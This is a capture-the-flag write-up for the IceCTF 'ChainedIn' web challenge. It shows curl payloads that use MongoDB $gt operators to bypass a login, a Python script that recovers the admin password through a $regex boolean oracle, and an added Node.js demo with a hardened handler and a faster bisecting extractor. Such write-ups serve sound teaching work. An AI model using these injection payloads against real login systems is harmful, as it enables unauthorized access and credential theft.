IceCTF [Web] - ChainedIn

The objective on this one was to get the administrator password on the website.

http://chainedin.vuln.icec.tf/

The first thing we can see is that this level is powered by MongoDB and angular.js, so a NoSQL injection is the natural thing to start looking for.

After some reading (http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html) I saw that it was possible to inject MongoDB query operators through the JSON login body. I tried the most common injection to bypass the login:

kinyabitch@Debian ~/h/c/chainedin> curl -H "Content-Type: application/json" -d '{"user": {"$gt": ""},"pass": {"$gt": ""}}' 'http://chainedin.vuln.icec.tf/login'
{"message":"Welcome back Administrator!"}

And voilà, I'm logged in as the admin, but there is no flag to be found. So I started thinking about modifying the injection into something boolean-based or time-based, like we do with ordinary SQL injections. After some reading in the MongoDB documentation (https://docs.mongodb.com/manual/reference/operator/query/regex/) I found that the $regex operator is perfect for a boolean-based injection: the server answers "logged in" or "invalid" depending on whether the pattern matches the stored password, so we can retrieve the password character by character.

Here you can see that when we start building the flag in the pattern we get our "true" response, the "Welcome back Administrator!" message:

kinyabitch@Debian ~/h/c/chainedin> curl -H "Content-Type: application/json" -d '{"user": {"$gt": ""},"pass": {"$regex": "IceCT"}}' 'http://chainedin.vuln.icec.tf/login'
{"message":"Welcome back Administrator!"}

But if we append a wrong character we get "Invalid Credentials", which gives us our "false" response:

kinyabitch@Debian ~/h/c/chainedin> curl -H 'Content-Type: application/json' -d '{"user": {"$gt": ""},"pass": {"$regex": "IceCTA"}}' 'http://chainedin.vuln.icec.tf/login'
{"message":"Invalid Credentials"}

With this we can brute-force the password character by character and get the flag :) Here is the Python script I wrote:

import json
import sys

import requests

# Known prefix of the flag; every pattern we send starts with it.
flag = 'IceCTF{'
alphabet = 'abcdefghijklmnopqrstuvxwyzABCDEFGHIJKLMNOPQRSTUVXWYZ0123456789_{}'
url = "http://chainedin.vuln.icec.tf/login"
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}

while True:
    for char in alphabet:
        # Same operator injection as the curl request: the user check is turned
        # into a comparison and the password check into a regex match, so the
        # server only says "Welcome back" when flag + char is a prefix of the
        # stored password.
        data = {"user": {"$gt": "Administrator"}, "pass": {"$regex": flag + char}}
        r = requests.post(url, data=json.dumps(data), headers=headers)
        if r.text == '{"message":"Welcome back Administrator!"}':
            flag += char
            print(flag)
            if char == '}':
                sys.exit(0)
            break  # restart the alphabet for the next position
    else:
        # No character matched: the next character is outside our alphabet,
        # so stop instead of looping forever.
        sys.exit("no match after %r, extend the alphabet" % flag)

kinyabitch@Debian ~/h/c/chainedin> python chained.py
IceCTF{I
IceCTF{I_
IceCTF{I_t
IceCTF{I_th
IceCTF{I_thO
IceCTF{I_thOu
IceCTF{I_thOug
IceCTF{I_thOugH
IceCTF{I_thOugHT
IceCTF{I_thOugHT_
IceCTF{I_thOugHT_Y
IceCTF{I_thOugHT_YO
IceCTF{I_thOugHT_YOu
IceCTF{I_thOugHT_YOu_
IceCTF{I_thOugHT_YOu_c
IceCTF{I_thOugHT_YOu_co
IceCTF{I_thOugHT_YOu_cou
IceCTF{I_thOugHT_YOu_coul
IceCTF{I_thOugHT_YOu_coulD
IceCTF{I_thOugHT_YOu_coulDN
IceCTF{I_thOugHT_YOu_coulDNt
IceCTF{I_thOugHT_YOu_coulDNt_
IceCTF{I_thOugHT_YOu_coulDNt_i
IceCTF{I_thOugHT_YOu_coulDNt_in
IceCTF{I_thOugHT_YOu_coulDNt_inJ
IceCTF{I_thOugHT_YOu_coulDNt_inJe
IceCTF{I_thOugHT_YOu_coulDNt_inJeC
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_n
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_no
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noS
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSq
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_t
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tH
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHa
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHan
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanK
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_m
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_mo
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_mon
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_monG
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_monGo
IceCTF{I_thOugHT_YOu_coulDNt_inJeCt_noSqL_tHanKs_monGo}
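To make the mechanics reproducible offline, here is an added example that is not the challenge's code and not the script above. It is written as a Node.js-style login handler against a tiny in-memory stand-in for the MongoDB query; the collection, the sample flag, the handler names and the matcher are all constructed for this example, and the matcher only models plain equality, $gt and $regex. It shows the three things the write-up relies on: why {"$gt": ""} bypasses the login when the parsed JSON body is spliced straight into the query, that rejecting non-string credentials (what express-mongo-sanitize or a request schema would do) closes the hole, and a faster version of the regex oracle that anchors the pattern with ^, escapes the recovered prefix (the flag contains "{", a regex metacharacter), and bisects the alphabet with a character class so each position costs about log2(n) requests instead of up to n.

```javascript
// Added example, not code from the ChainedIn challenge. A minimal in-memory
// stand-in for the MongoDB query behind a Node/Mongo login so the operator
// injection and the $regex oracle can be run offline.

// Constructed sample collection (not the real challenge data).
const users = [
  { user: "Administrator", pass: "IceCTF{s4mple_fl4g}" },
  { user: "bob", pass: "hunter2" },
];

// Evaluate one field condition roughly as MongoDB does for string fields:
// a scalar means equality, an object is a map of operators. Only the two
// operators used in the write-up are modelled.
function fieldMatches(actual, cond) {
  if (cond === null || typeof cond !== "object") return actual === cond;
  for (const [op, arg] of Object.entries(cond)) {
    if (op === "$gt") {
      if (!(typeof actual === "string" && actual > arg)) return false;
    } else if (op === "$regex") {
      if (!(typeof actual === "string" && new RegExp(arg).test(actual))) return false;
    } else {
      throw new Error(`unsupported operator ${op}`);
    }
  }
  return true;
}

// findOne: first document for which every field in the query matches.
function findOne(query) {
  const hit = users.find((doc) =>
    Object.entries(query).every(([field, cond]) => fieldMatches(doc[field], cond))
  );
  return hit || null;
}

// Vulnerable handler: body-parser already turned the JSON into objects, and they
// go straight into the query, so {"$gt": ""} becomes a comparison, not a string.
function loginVulnerable(body) {
  const doc = findOne({ user: body.user, pass: body.pass });
  return doc ? `Welcome back ${doc.user}!` : "Invalid Credentials";
}

// Hardened handler: credentials must be plain strings before they reach the
// query (the same effect express-mongo-sanitize or a request schema gives you).
function loginSafe(body) {
  if (typeof body.user !== "string" || typeof body.pass !== "string") {
    return "Invalid Credentials";
  }
  return loginVulnerable(body);
}

// Escape regex metacharacters so the recovered prefix (which contains "{") and
// the alphabet characters are always matched literally.
function reEscape(s) {
  return s.replace(/[.*+?^${}()|[\]\\\-]/g, "\\$&");
}

// Boolean-oracle extraction. `oracle(body)` returns true when the login succeeds.
// Each position is found by bisecting the alphabet with a character class, so it
// costs about log2(alphabet.length) requests instead of up to alphabet.length,
// and every pattern is anchored with ^ so it can only match from the start.
function extractSecret(oracle, alphabet, known = "", maxLen = 64) {
  let requests = 0;
  const ask = (pattern) => {
    requests += 1;
    return oracle({ user: { $gt: "" }, pass: { $regex: pattern } });
  };
  let secret = known;
  while (secret.length < maxLen) {
    // Is there any character after the current prefix?
    if (!ask(`^${reEscape(secret)}.`)) break;
    let cands = alphabet.split("");
    while (cands.length > 1) {
      const half = cands.slice(0, Math.ceil(cands.length / 2));
      const cls = `[${half.map(reEscape).join("")}]`;
      cands = ask(`^${reEscape(secret)}${cls}`) ? half : cands.slice(half.length);
    }
    // Confirm the single survivor; this fails only if the real character is
    // outside our alphabet, in which case we stop rather than loop forever.
    if (!ask(`^${reEscape(secret)}${reEscape(cands[0])}`)) break;
    secret += cands[0];
  }
  return { secret, requests };
}

const ALPHABET =
  "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_{}";

// Put the whole write-up together against the stand-in.
function demo() {
  const injected = { user: { $gt: "" }, pass: { $gt: "" } };
  const bypass = loginVulnerable(injected); // "Welcome back Administrator!"
  const blocked = loginSafe(injected); // "Invalid Credentials"
  const oracle = (body) => loginVulnerable(body) === "Welcome back Administrator!";
  const { secret, requests } = extractSecret(oracle, ALPHABET, "IceCTF{");
  return { bypass, blocked, secret, requests };
}

console.log(JSON.stringify(demo(), null, 2));
```

Run it with node and it prints the bypass result, the blocked result, the recovered sample secret and the number of oracle queries it took. Against a live target you would replace the call to `loginVulnerable` inside `oracle` with an HTTP POST and compare the response body exactly as the Python script does; MongoDB evaluates $regex with PCRE, so the anchors, escapes and character classes used here behave the same there.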